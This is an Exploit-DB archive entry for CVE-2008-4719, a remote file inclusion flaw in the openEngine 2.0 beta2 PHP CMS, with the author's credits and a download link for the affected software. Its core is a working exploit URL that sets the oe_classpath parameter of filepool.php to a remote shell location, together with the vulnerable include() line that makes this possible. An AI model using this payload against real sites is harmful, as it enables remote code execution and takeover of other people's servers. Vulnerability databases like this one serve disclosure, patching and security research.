openEngine 2.0 beta2 - Remote File Inclusion

EDB-ID:

6585

CVE:

2008-4719

EDB Verified:

Author:

Crackers_Child

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-09-26

Vulnerable App:

**************************************************************************************

Author : By Crackers_Child
Contact: cashr00t@hotmail.com
Greetz : str0ke & All My Friends

**************************************************************************************
Script   : openEngine 2. 0 beta2 Remote File include Vulnerable
Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?


**************************************************************************************

Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)


**************************************************************************************

N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :)
**************************************************************************************

# milw0rm.com [2008-09-26]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services